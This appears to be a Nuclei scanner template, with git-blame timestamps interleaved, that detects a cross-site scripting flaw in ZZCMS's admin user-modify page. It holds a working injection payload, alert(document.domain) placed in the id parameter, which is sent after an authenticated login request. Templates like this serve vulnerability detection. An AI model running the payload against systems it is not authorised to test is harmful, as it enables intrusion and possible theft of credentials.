2022-04-16 09:02:25 +00:00
id : zzcms-xss
info :
2022-07-24 15:46:05 +00:00
name : ZZCMS - Cross-Site Scripting
2022-04-16 09:02:25 +00:00
author : ritikchaddha
2022-09-23 17:53:08 +00:00
severity : high
description : ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
2022-04-16 09:02:25 +00:00
reference :
- https://github.com/JcQSteven/blog/issues/20
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-07-24 13:43:49 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2022-07-24 13:43:49 +00:00
tags : zzcms,xss,authenticated
2022-04-16 09:02:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-24 13:43:49 +00:00
- raw :
- |
POST /admin/logincheck.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
admin={{username}}&pass={{password}}
- |
GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
Host : {{Hostname}}
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- "contains(header_2, 'text/html')"
2022-07-24 13:43:49 +00:00
- "status_code_2 == 200"
- 'contains(body_2, "参数 1\"+alert(document.domain)+")'
condition : and
2023-11-27 09:19:41 +00:00
# digest: 490a0046304402201917e4069e1b48e9d4eabf8f7da2dcc9ca0c0e4bfb3848588e7a9d275c574c50022006b83ad4a74ed8d04f09feb25dfda884ab4434abae22912fee1fe511515d442d:922c64590222798bb761d5b6d8e72950